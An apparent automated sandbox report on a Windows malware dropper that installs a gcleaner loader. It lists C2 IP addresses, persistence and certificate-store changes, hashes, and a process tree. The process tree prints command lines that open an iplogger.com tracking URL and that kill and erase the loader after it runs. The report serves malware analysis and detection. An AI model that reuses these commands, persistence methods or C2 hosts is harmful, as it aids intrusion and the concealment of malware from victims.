Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
25-05-2023 04:35
Static task
static1
Behavioral task
behavioral1
Sample
0b79fbf16b76bd0ff14e9d079e40e889.exe
Resource
win7-20230220-en
General
-
Target
0b79fbf16b76bd0ff14e9d079e40e889.exe
-
Size
380KB
-
MD5
0b79fbf16b76bd0ff14e9d079e40e889
-
SHA1
eca7116292f3437102b06c7f2b78e32fa6ae69a5
-
SHA256
e99574f67e511e9b940c788de58592b02542972981f69ebe2806d876e01135fb
-
SHA512
6bebbd4cc5b7ecfa7f90ea1f65ba83c74f9be14080e12cca30026067627914e5a9e0809cbb79aec4081c1498757201022eedfcef26a47d4cbe9f03dbcf79f26d
-
SSDEEP
6144:x/QiQXCfkm+ksmpk3U9j0IT2OGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoglM7LT:pQi3fP6m6UR0IT2lL//plmW9bTXeVhD4
Malware Config
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Signatures
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts GABRIEL.exe -
Executes dropped EXE 4 IoCs
pid Process 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 1184 GABRIEL.exe 940 Lubebinory.exe 2152 gcleaner.exe -
Loads dropped DLL 5 IoCs
pid Process 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Uninstall Information\\Hunaezhohabu.exe\"" GABRIEL.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\Common Files\VAMMKXJHRP\poweroff.exe GABRIEL.exe File created C:\Program Files (x86)\Uninstall Information\Hunaezhohabu.exe GABRIEL.exe File created C:\Program Files (x86)\Uninstall Information\Hunaezhohabu.exe.config GABRIEL.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 2380 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{527085C1-FAC6-11ED-9047-DE010D53120A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c06413e147892842ada8d8034690c3d800000000020000000000106600000001000020000000bf8dedda0acb15912748b488496c925aa668f718b0259f2b6c7e5a99d8b467bd000000000e80000000020000200000000d691b7acaebb01a64deee2e7ea16fe8bab42409740e16b57677bdf64d21182c200000008c72affb92c9fcf56963ff9e04c99ae641a2ed091735b4901fb39744fb5869ea40000000b6f0a0178b0adea1fc8b2bdfa3b28eb1625b5e0127c74ab8bed385999c20fac7ce8a43df635ffdd47b0a9a8c25c66b8f0ad581925563292976e94bbee26102ec iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "391761496" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c06413e147892842ada8d8034690c3d80000000002000000000010660000000100002000000009ecdf39bc79f65ffc9d9b1e5f4720975cb99fe86989b0b6740e5c960c8deb2f000000000e800000000200002000000008e74c1c95934568b5e4eb6c067edf4e6a89b3844fde8cf69ede7790dca5a75190000000b5800015f10f3c3d26449b278f6d0e708cfcb022dacd463710490e5238a404551456624a9f73e619400e08a9ef75afaacaaf7fe91f7917223f8409ac38ede61347a7823fbdfc718c6a0689ed94058261b2f359312a5d0e44f464854e3ff4135de677427b484a49cea03c6a66e036579002bf06985521d7d13b34e693be1ea203a2c42c149197ad6b98dbaf01f9a2e2a740000000431158343ef970bb8f43c40c177198acb45c6f8910c07ca98d5227cd2af550c8b93cd31648a8b771ae922348a70ab171bf363a75fd90879d5e2d23295ccdf48a iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60591729d38ed901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 GABRIEL.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd GABRIEL.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd GABRIEL.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd GABRIEL.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2152 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe 940 Lubebinory.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1184 GABRIEL.exe Token: SeDebugPrivilege 940 Lubebinory.exe Token: SeDebugPrivilege 2380 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 268 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 268 iexplore.exe 268 iexplore.exe 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 624 wrote to memory of 1716 624 0b79fbf16b76bd0ff14e9d079e40e889.exe 28 PID 1716 wrote to memory of 1184 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 31 PID 1716 wrote to memory of 1184 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 31 PID 1716 wrote to memory of 1184 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 31 PID 1716 wrote to memory of 1184 1716 0b79fbf16b76bd0ff14e9d079e40e889.tmp 31 PID 1184 wrote to memory of 940 1184 GABRIEL.exe 32 PID 1184 wrote to memory of 940 1184 GABRIEL.exe 32 PID 1184 wrote to memory of 940 1184 GABRIEL.exe 32 PID 1184 wrote to memory of 1020 1184 GABRIEL.exe 33 PID 1184 wrote to memory of 1020 1184 GABRIEL.exe 33 PID 1184 wrote to memory of 1020 1184 GABRIEL.exe 33 PID 1020 wrote to memory of 268 1020 cmd.exe 35 PID 1020 wrote to memory of 268 1020 cmd.exe 35 PID 1020 wrote to memory of 268 1020 cmd.exe 35 PID 268 wrote to memory of 2004 268 iexplore.exe 36 PID 268 wrote to memory of 2004 268 iexplore.exe 36 PID 268 wrote to memory of 2004 268 iexplore.exe 36 PID 268 wrote to memory of 2004 268 iexplore.exe 36 PID 940 wrote to memory of 2056 940 Lubebinory.exe 37 PID 940 wrote to memory of 2056 940 Lubebinory.exe 37 PID 940 wrote to memory of 2056 940 Lubebinory.exe 37 PID 2056 wrote to memory of 2152 2056 cmd.exe 39 PID 2056 wrote to memory of 2152 2056 cmd.exe 39 PID 2056 wrote to memory of 2152 2056 cmd.exe 39 PID 2056 wrote to memory of 2152 2056 cmd.exe 39 PID 2152 wrote to memory of 2340 2152 gcleaner.exe 42 PID 2152 wrote to memory of 2340 2152 gcleaner.exe 42 PID 2152 wrote to memory of 2340 2152 gcleaner.exe 42 PID 2152 wrote to memory of 2340 2152 gcleaner.exe 42 PID 2340 wrote to memory of 2380 2340 cmd.exe 44 PID 2340 wrote to memory of 2380 2340 cmd.exe 44 PID 2340 wrote to memory of 2380 2340 cmd.exe 44 PID 2340 wrote to memory of 2380 2340 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe"C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Users\Admin\AppData\Local\Temp\is-NEJLC.tmp\0b79fbf16b76bd0ff14e9d079e40e889.tmp"C:\Users\Admin\AppData\Local\Temp\is-NEJLC.tmp\0b79fbf16b76bd0ff14e9d079e40e889.tmp" /SL5="$70122,140559,56832,C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\is-9REI1.tmp\GABRIEL.exe"C:\Users\Admin\AppData\Local\Temp\is-9REI1.tmp\GABRIEL.exe" /S /UID=flabs23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\8a-2cfab-a1e-4e2b9-539138762994c\Lubebinory.exe"C:\Users\Admin\AppData\Local\Temp\8a-2cfab-a1e-4e2b9-539138762994c\Lubebinory.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t1ujp4nv.4fp\gcleaner.exe /mixfive & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\t1ujp4nv.4fp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\t1ujp4nv.4fp\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\t1ujp4nv.4fp\gcleaner.exe" & exit7⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1UdyH44⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1UdyH45⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:268 CREDAT:275457 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2004
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD566410a45d437d49ad64d4317a838670c
SHA12c78a8fe65b4563ac7e4e48e42fc7f05cc75219a
SHA2564fbe046747bbb71fea32b29b11652ad4fc3f51fc637c1e76058af4c3a2c03e71
SHA5122fce08a9352dc9972bcd42974e0c391751f74feb9988fd3deb40119c6d1f7919346d80fd902ddaed4543ac7e8036fbb0b8d265d51e3076b9877e0ba5efd9ee35
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5039c4dbfb0353d9e691bdbadbb7b1c07
SHA12bc143ce55061aa0ee422df66602975d5cd2d038
SHA256f5d35bab1ab6df8321b9231fd645b949d728d5c4e7102c9b54c9155dde8133dd
SHA51274fc4d5d8ad3afaef7bdffe1975ffba1a5f206565e09202d1feab1fa8b29b3cc6e5e3a07780daf555c2c226d6d967c08f5f12049f390650268ed1295749dfcfb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d8465ae0364102321465dad52eb688be
SHA158d6f48fea68d1d4efa452fe28fcfe135a881a80
SHA256f732f779e5c99fc7d15aa4269375b3f597209362926f3284246848e76a924356
SHA512aca04660f7090b66ba758a8e5cbc108b04110a24efa87567edc7c8f6d7b03ee1e9b6ab704e0e0286b8e5a0b6fa8df01ac0049ca15b9de8b93394ad6e4ca0b2d6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59ffe762ba40c395f456e645d1398f524
SHA10b23d63c3de76935ec856b0e3f438bf085b88350
SHA256c0ee57993ce07c5b668aef4ebf1651b4669ace7b39581d40a51838e79080431c
SHA51244cbf1b99739eb59863813bccf5a45b6490209e3896ab92ba516ecc855caca15130cfa57e0866b2e9b50098d2ed54d2ad89b7194268a0bcb970f9cc652ebcb2c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f055837a457452360f650601bd9c01d1
SHA183837236a3fca2f9841a6a7ff5f789b263f8d060
SHA2567faf8adccf158a30714c39b74fbbe0c55c3ccd360a47a6ac15c644081db34d4b
SHA512c5be8b4e226ecb59d93a54ee2c324cf99727b0e5c0c062fece6c42fda9e9b64af460c9e85bd8103d035cb63bd8efc527675c21f1c4a83e52d2a50d82897c22f4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51dbd75e2206bc4aaef3b81f92036757e
SHA102248bb257d668c7588eac0312088916ef22167f
SHA25683e0196746998af3e0936a7ac00df28fa7218df88bf467b5ac1f4ba6800e22a0
SHA512ab704f62f8a684ace021dc19b4f89310b12df35a576bc947c605aa2f04ab148fbb1a10988831dda6f9fbc480a5e440941e3cd14eff172714318b0eea9ed5ed71
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59031b80a26fdd8abdecb091f811451d0
